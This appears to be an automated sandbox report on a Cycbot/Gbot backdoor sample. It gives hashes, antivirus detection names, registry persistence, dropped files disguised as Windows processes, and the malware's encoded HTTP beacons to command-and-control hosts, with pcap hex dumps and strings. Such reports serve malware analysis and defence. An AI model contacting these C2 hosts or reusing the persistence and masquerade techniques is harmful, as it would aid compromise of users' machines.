Analysis Date2014-10-09 17:59:28
MD506f83b3243cf4acd15fccb28d10614f2
SHA14c42999eb2d6453c3c6b3a29ca7e1316fb6498fb

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: cbd7204b2963d129d9d40748c1fcfb4d sha1: b7430a08bf327ad1a9b5155bfcff167cf507a53b size: 88576
Section.tls md5: 788eb8dd030e911295a3bf846c1b435c sha1: a8ac4e6731d35841cf8362a36a3e79c68e72a693 size: 1024
Section.data md5: 26047e62bdad38b001c957453f3f2e27 sha1: 7307bf76a30a60da91399d4cab2eee8d08028e13 size: 76288
Section.reloc md5: d77d9be3e4ea960421acd97f81279a86 sha1: 23c587186fd99834a837fb7033964bcd01fadda8 size: 1024
Timestamp2005-08-29 01:10:26
PEhashb28d8e3a72467112c3ec94127f9bf4e0b33163b0
IMPhash17e8167e25c6684d6318191de7f9e38c
AV360 SafeGen:Trojan.Heur.KS.2
AVAd-AwareGen:Trojan.Heur.KS.2
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)no_virus
AVAuthentiumW32/Goolbot.J.gen!Eldorado
AVAvira (antivir)BDS/Cycbot.BP
AVCA (E-Trust Ino)Win32/FakeAlert.J!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVTrojan.Cycbot-38
AVDr. WebBackDoor.Gbot.53
AVEmsisoftGen:Trojan.Heur.KS.2
AVEset (nod32)Win32/Cycbot.AF
AVFortinetW32/Kryptik.POT!tr
AVFrisk (f-prot)W32/Goolbot.J.gen!Eldorado
AVF-SecureGen:Trojan.Heur.KS.2
AVGrisoft (avg)BackDoor.Generic_r.TF
AVIkarusBackdoor.Win32.Cycbot
AVK7Backdoor ( 003210941 )
AVKasperskyBackdoor.Win32.Gbot.lvw
AVMalwareBytesBackdoor.Bot
AVMcafeeBackDoor-EXI.gen.k
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Trojan.Heur.KS.2
AVNormanwinpe/Cycbot.BD
AVRisingno_virus
AVSophosMal/FakeAV-IS
AVSymantecBackdoor.Cycbot!gen4
AVTrend MicroBKDR_CYCBOT.SME3
AVVirusBlokAda (vba32)Backdoor.Gbot
AVYara APTno_virus
AVZillya!Backdoor.Gbot.Win32.1571

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\conhost ➝
C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Mutex{A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{1ACD3490-8843-47EB-867B-EDDDD7FA37FD}
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex{6988405C-71C3-427c-975A-0398706E79EE}
Winsock DNSresetsystems-1.com
Winsock DNS127.0.0.1
Winsock DNShappyratatuy.com
Winsock DNSonlineinstitute.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\dwm.exe

Network Details:

DNSonlineinstitute.com
Type: A
67.227.195.200
DNSzonedg.com
Type: A
141.8.225.80
DNSzonedg.com
Type: A
141.8.225.80
DNSresetsystems-1.com
Type: A
DNShappyratatuy.com
Type: A
HTTP GEThttp://onlineinstitute.com/g7/images/logo.jpg?v53=66&tq=gKZEtzyY5lmCFopZgzz5NP9C1Mlyv6J6%2BczKbZ8v11qe3AcRJNoRZmCUb%2BgKOnbzCFZzXDpoHEu7ndA1pBPVm8Jfal%2B2wODtA9UbXg9t286AdndwJ3wq76cJ7nJfdVHRDrspjY%2FmKEVWhG6nwXT7gGB6FuHsbmwHQ3rFDT56MDJl8igFmJ%2FueKAbAhCG0nF2xJXZA5xSDjcU1jYwz19r8tjU1oAUwCQHtJ6KhywW3LXMVxoQgDWbCWwMrrK%2FVeXhNfaDvm%2BtwjB0i0YP0bPm4vxsqRnvtiktX0Aqw%2Bi%2F3Tk1mVyS4lzznfsb6EhL%2F49TVuznugm1TDG2p68EyKJrXOqCks%2B8UHq6P29jx1Q3NbxgyMAKswY1OkyJvvHpz31KM1kG%2FmpssDrbJ0EPuBp6WJOXk2E7kwktURx3iZ594k8O2YR5%2BjEi2lEUJp9Zv
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfxkX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfxkX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJtX%2BSNxVKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfxkX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfxkX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJuX%2BSNzVKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfxkX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2F82%2BcoJsX%2BSNxb5ygm1C4lKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP192.168.1.1:1031 ➝ 67.227.195.200:80
Flows TCP192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1035 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1036 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1037 ➝ 141.8.225.80:80

Raw Pcap
0x00000000 (00000)   47455420 2f67372f 696d6167 65732f6c   GET /g7/images/l
0x00000010 (00016)   6f676f2e 6a70673f 7635333d 36362674   ogo.jpg?v53=66&t
0x00000020 (00032)   713d674b 5a45747a 7959356c 6d43466f   q=gKZEtzyY5lmCFo
0x00000030 (00048)   705a677a 7a354e50 3943314d 6c797636   pZgzz5NP9C1Mlyv6
0x00000040 (00064)   4a362532 42637a4b 625a3876 31317165   J6%2BczKbZ8v11qe
0x00000050 (00080)   33416352 4a4e6f52 5a6d4355 62253242   3AcRJNoRZmCUb%2B
0x00000060 (00096)   674b4f6e 627a4346 5a7a5844 706f4845   gKOnbzCFZzXDpoHE
0x00000070 (00112)   75376e64 41317042 50566d38 4a66616c   u7ndA1pBPVm8Jfal
0x00000080 (00128)   25324232 774f4474 41395562 58673974   %2B2wODtA9UbXg9t
0x00000090 (00144)   32383641 646e6477 4a337771 3736634a   286AdndwJ3wq76cJ
0x000000a0 (00160)   376e4a66 64564852 44727370 6a592532   7nJfdVHRDrspjY%2
0x000000b0 (00176)   466d4b45 56576847 366e7758 54376747   FmKEVWhG6nwXT7gG
0x000000c0 (00192)   42364675 4873626d 77485133 72464454   B6FuHsbmwHQ3rFDT
0x000000d0 (00208)   35364d44 4a6c3869 67466d4a 25324675   56MDJl8igFmJ%2Fu
0x000000e0 (00224)   654b4162 41684347 306e4632 784a585a   eKAbAhCG0nF2xJXZ
0x000000f0 (00240)   41357853 446a6355 316a5977 7a313972   A5xSDjcU1jYwz19r
0x00000100 (00256)   38746a55 316f4155 77435148 744a364b   8tjU1oAUwCQHtJ6K
0x00000110 (00272)   68797757 334c584d 56786f51 67445762   hywW3LXMVxoQgDWb
0x00000120 (00288)   4357774d 72724b25 32465665 58684e66   CWwMrrK%2FVeXhNf
0x00000130 (00304)   6144766d 25324274 776a4230 69305950   aDvm%2BtwjB0i0YP
0x00000140 (00320)   3062506d 34767873 71526e76 74696b74   0bPm4vxsqRnvtikt
0x00000150 (00336)   58304171 77253242 69253246 33546b31   X0Aqw%2Bi%2F3Tk1
0x00000160 (00352)   6d567953 346c7a7a 6e667362 3645684c   mVyS4lzznfsb6EhL
0x00000170 (00368)   25324634 39545675 7a6e7567 6d315444   %2F49TVuznugm1TD
0x00000180 (00384)   47327036 3845794b 4a72584f 71436b73   G2p68EyKJrXOqCks
0x00000190 (00400)   25324238 55487136 5032396a 78315133   %2B8UHq6P29jx1Q3
0x000001a0 (00416)   4e627867 794d414b 73775931 4f6b794a   NbxgyMAKswY1OkyJ
0x000001b0 (00432)   76764870 7a33314b 4d316b47 2532466d   vvHpz31KM1kG%2Fm
0x000001c0 (00448)   70737344 72624a30 45507542 7036574a   pssDrbJ0EPuBp6WJ
0x000001d0 (00464)   4f586b32 45376b77 6b745552 7833695a   OXk2E7kwktURx3iZ
0x000001e0 (00480)   3539346b 384f3259 52352532 426a4569   594k8O2YR5%2BjEi
0x000001f0 (00496)   326c4555 4a70395a 76204854 54502f31   2lEUJp9Zv HTTP/1
0x00000200 (00512)   2e300d0a 436f6e6e 65637469 6f6e3a20   .0..Connection: 
0x00000210 (00528)   636c6f73 650d0a48 6f73743a 206f6e6c   close..Host: onl
0x00000220 (00544)   696e6569 6e737469 74757465 2e636f6d   ineinstitute.com
0x00000230 (00560)   0d0a4163 63657074 3a202a2f 2a0d0a55   ..Accept: */*..U
0x00000240 (00576)   7365722d 4167656e 743a206d 6f7a696c   ser-Agent: mozil
0x00000250 (00592)   6c612f32 2e300d0a 0d0a                la/2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   786b5825 32425039 68253242 49307344   xkX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 42537225 32466525   OhLgjh88BSr%2Fe%
0x000000c0 (00192)   32425635 5a755267 25334425 33442048   2BV5ZuRg%3D%3D H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a207a   TTP/1.1..Host: z
0x000000e0 (00224)   6f6e6564 672e636f 6d0d0a55 7365722d   onedg.com..User-
0x000000f0 (00240)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000100 (00256)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000110 (00272)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000120 (00288)   73204e54 20352e31 290d0a43 6f6e7465   s NT 5.1)..Conte
0x00000130 (00304)   6e742d4c 656e6774 683a2030 0d0a436f   nt-Length: 0..Co
0x00000140 (00320)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000150 (00336)   0a0d0a71 77253242 69253246 33546b31   ...qw%2Bi%2F3Tk1
0x00000160 (00352)   6d567953 346c7a7a 6e667362 3645684c   mVyS4lzznfsb6EhL
0x00000170 (00368)   25324634 39545675 7a6e7567 6d315444   %2F49TVuznugm1TD
0x00000180 (00384)   47327036 3845794b 4a72584f 71436b73   G2p68EyKJrXOqCks
0x00000190 (00400)   25324238 55487136 5032396a 78315133   %2B8UHq6P29jx1Q3
0x000001a0 (00416)   4e627867 794d414b 73775931 4f6b794a   NbxgyMAKswY1OkyJ
0x000001b0 (00432)   76764870 7a33314b 4d316b47 2532466d   vvHpz31KM1kG%2Fm
0x000001c0 (00448)   70737344 72624a30 45507542 7036574a   pssDrbJ0EPuBp6WJ
0x000001d0 (00464)   4f586b32 45376b77 6b745552 7833695a   OXk2E7kwktURx3iZ
0x000001e0 (00480)   3539346b 384f3259 52352532 426a4569   594k8O2YR5%2BjEi
0x000001f0 (00496)   326c4555 4a70395a 76204854 54502f31   2lEUJp9Zv HTTP/1
0x00000200 (00512)   2e300d0a 436f6e6e 65637469 6f6e3a20   .0..Connection: 
0x00000210 (00528)   636c6f73 650d0a48 6f73743a 206f6e6c   close..Host: onl
0x00000220 (00544)   696e6569 6e737469 74757465 2e636f6d   ineinstitute.com
0x00000230 (00560)   0d0a4163 63657074 3a202a2f 2a0d0a55   ..Accept: */*..U
0x00000240 (00576)   7365722d 4167656e 743a206d 6f7a696c   ser-Agent: mozil
0x00000250 (00592)   6c612f32 2e300d0a 0d0a                la/2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   786b5825 32425039 68253242 49307344   xkX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683873 47253242 636f4a74   OhLgjh8sG%2BcoJt
0x000000c0 (00192)   58253242 534e7856 4b763937 35586c6d   X%2BSNxVKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6564 672e636f 6d0d0a55   t: zonedg.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a3c 6872202f 3e0a2020   ose....<hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   786b5825 32425039 68253242 49307344   xkX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 42537225 32466525   OhLgjh88BSr%2Fe%
0x000000c0 (00192)   32425635 5a755267 25334425 33442048   2BV5ZuRg%3D%3D H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a207a   TTP/1.1..Host: z
0x000000e0 (00224)   6f6e6564 672e636f 6d0d0a55 7365722d   onedg.com..User-
0x000000f0 (00240)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000100 (00256)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000110 (00272)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000120 (00288)   73204e54 20352e31 290d0a43 6f6e7465   s NT 5.1)..Conte
0x00000130 (00304)   6e742d4c 656e6774 683a2030 0d0a436f   nt-Length: 0..Co
0x00000140 (00320)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000150 (00336)   0a0d0a71 77253242 69253246 33546b31   ...qw%2Bi%2F3Tk1
0x00000160 (00352)   6d567953 346c7a7a 6e667362 3645684c   mVyS4lzznfsb6EhL
0x00000170 (00368)   25324634 39545675 7a6e7567 6d315444   %2F49TVuznugm1TD
0x00000180 (00384)   47327036 3845794b 4a72584f 71436b73   G2p68EyKJrXOqCks
0x00000190 (00400)   25324238 55487136 5032396a 78315133   %2B8UHq6P29jx1Q3
0x000001a0 (00416)   4e627867 794d414b 73775931 4f6b794a   NbxgyMAKswY1OkyJ
0x000001b0 (00432)   76764870 7a33314b 4d316b47 2532466d   vvHpz31KM1kG%2Fm
0x000001c0 (00448)   70737344 72624a30 45507542 7036574a   pssDrbJ0EPuBp6WJ
0x000001d0 (00464)   4f586b32 45376b77 6b745552 7833695a   OXk2E7kwktURx3iZ
0x000001e0 (00480)   3539346b 384f3259 52352532 426a4569   594k8O2YR5%2BjEi
0x000001f0 (00496)   326c4555 4a70395a 76204854 54502f31   2lEUJp9Zv HTTP/1
0x00000200 (00512)   2e300d0a 436f6e6e 65637469 6f6e3a20   .0..Connection: 
0x00000210 (00528)   636c6f73 650d0a48 6f73743a 206f6e6c   close..Host: onl
0x00000220 (00544)   696e6569 6e737469 74757465 2e636f6d   ineinstitute.com
0x00000230 (00560)   0d0a4163 63657074 3a202a2f 2a0d0a55   ..Accept: */*..U
0x00000240 (00576)   7365722d 4167656e 743a206d 6f7a696c   ser-Agent: mozil
0x00000250 (00592)   6c612f32 2e300d0a 0d0a                la/2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   786b5825 32425039 68253242 49307344   xkX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683873 47253242 636f4a75   OhLgjh8sG%2BcoJu
0x000000c0 (00192)   58253242 534e7a56 4b763937 35586c6d   X%2BSNzVKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6564 672e636f 6d0d0a55   t: zonedg.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a3c 6872202f 3e0a2020   ose....<hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   786b5825 32425039 68253242 49307344   xkX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 46383225 3242636f   OhLgjh%2F82%2Bco
0x000000c0 (00192)   4a735825 3242534e 78623579 676d3143   JsX%2BSNxb5ygm1C
0x000000d0 (00208)   346c4b76 39373558 6c6d3547 20485454   4lKv975Xlm5G HTT
0x000000e0 (00224)   502f312e 310d0a48 6f73743a 207a6f6e   P/1.1..Host: zon
0x000000f0 (00240)   6564672e 636f6d0d 0a557365 722d4167   edg.com..User-Ag
0x00000100 (00256)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000110 (00272)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000120 (00288)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000130 (00304)   4e542035 2e31290d 0a436f6e 74656e74   NT 5.1)..Content
0x00000140 (00320)   2d4c656e 6774683a 20300d0a 436f6e6e   -Length: 0..Conn
0x00000150 (00336)   65637469 6f6e3a20 636c6f73 650d0a0d   ection: close...
0x00000160 (00352)   0a567953 346c7a7a 6e667362 3645684c   .VyS4lzznfsb6EhL
0x00000170 (00368)   25324634 39545675 7a6e7567 6d315444   %2F49TVuznugm1TD
0x00000180 (00384)   47327036 3845794b 4a72584f 71436b73   G2p68EyKJrXOqCks
0x00000190 (00400)   25324238 55487136 5032396a 78315133   %2B8UHq6P29jx1Q3
0x000001a0 (00416)   4e627867 794d414b 73775931 4f6b794a   NbxgyMAKswY1OkyJ
0x000001b0 (00432)   76764870 7a33314b 4d316b47 2532466d   vvHpz31KM1kG%2Fm
0x000001c0 (00448)   70737344 72624a30 45507542 7036574a   pssDrbJ0EPuBp6WJ
0x000001d0 (00464)   4f586b32 45376b77 6b745552 7833695a   OXk2E7kwktURx3iZ
0x000001e0 (00480)   3539346b 384f3259 52352532 426a4569   594k8O2YR5%2BjEi
0x000001f0 (00496)   326c4555 4a70395a 76204854 54502f31   2lEUJp9Zv HTTP/1
0x00000200 (00512)   2e300d0a 436f6e6e 65637469 6f6e3a20   .0..Connection: 
0x00000210 (00528)   636c6f73 650d0a48 6f73743a 206f6e6c   close..Host: onl
0x00000220 (00544)   696e6569 6e737469 74757465 2e636f6d   ineinstitute.com
0x00000230 (00560)   0d0a4163 63657074 3a202a2f 2a0d0a55   ..Accept: */*..U
0x00000240 (00576)   7365722d 4167656e 743a206d 6f7a696c   ser-Agent: mozil
0x00000250 (00592)   6c612f32 2e300d0a 0d0a                la/2.0....


Strings
a.
.h
.
.
.
.
.ZQ%
..
9
.
.
080904b0
1659
3.0.0.1
FileVersion
&No Exit  Shift+N
PrivateBuild
ProductVersion
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
&Yes
0h+rhph
0hZ/^I
0YO[;8
1C"hQ'
1|NJ9V
1$W6[m
1Y;Rv+
2d7@eyw
|`2drAD
2h>6Ph
2hF-h)*
2hOleN
<!?2hS
2hs_RhK
2hvEFd
;3|*+3
*[34"3
?3A#I(]
3}c-gLQ3cD:`
3h	.``
3p{}S~
3^VrkWz
&"3y8^
.3yn:o
42h"h%\$a
4`[2vl4
}45U2hY
$	48i h
4=:Bh1
%4EQOx
 4k"{P7=
52hCV{
+=5d40
6bhRhFK
6Dw$&n7
}{$-6}F
=6%k\`4
6qphph
6xHl}rT
74ws|ypr
7#Bh@h
7O<h"h
7Rh(0hw
7XfA7]
8b(yDcl<ZoV
8EGmn}
}92"[.q
9{HPh)
9zR[f>_
`a7Y8x
_A=CJ^
ADPHn"?Y
Ae2h{?
a"hbh'
aI	+JiO
AJ"h"h
Ajs^6v
AlphaBlend
	)|A|o
<A!o.I
Arh.+7
ArhOD3
_aUdVs
\[AYbH
B^#`&@
bACYV\y
~?bC!@
bh43-	
.(*Bh6G<
Bh8>#)+
bh~ h|
bh\h<D
\Bh?@hf}5
bh`hm'F
bh@hRh5en
bhMwq|8
bh>OZ&^
Bhph=de
bhPh"h
*bhPhqBh
BhTrhV
B]_Hua
,[bn"3
%&b~p0
+"c5}T
]_C<>C
cJq/B`
CoGetMalloc
CoTaskMemFree
CreateProcessA
)d17ep
,,d!2\
,D4T h[j
@.data
DbqTAM
dd"h`h
d\	G7<{+
D~GN9Ep
D^J9t1
dKcm^47
doXPSU>
ds/$2N
D]zA<'
DZ`haI
|?eCrh
Eey`-<s
Ei]Mph
#_eK\AI
EKI"EL
E['LH 
EnumResourceNamesA
eUqd$'
FDi(:n
?Fdvpt
"-&fDy
FindFirstFileW
FRq.^K
	FTP/n
	fwBhc~
( F{wN4
|^G-]]
G0vac)O*
G]-BhQ7O
GetACP
GetCalendarInfoA
GetCurrentProcess
GetEnvironmentVariableA
GetLocaleInfoA
GetModuleHandleA
GetThreadLocale
ghAd h
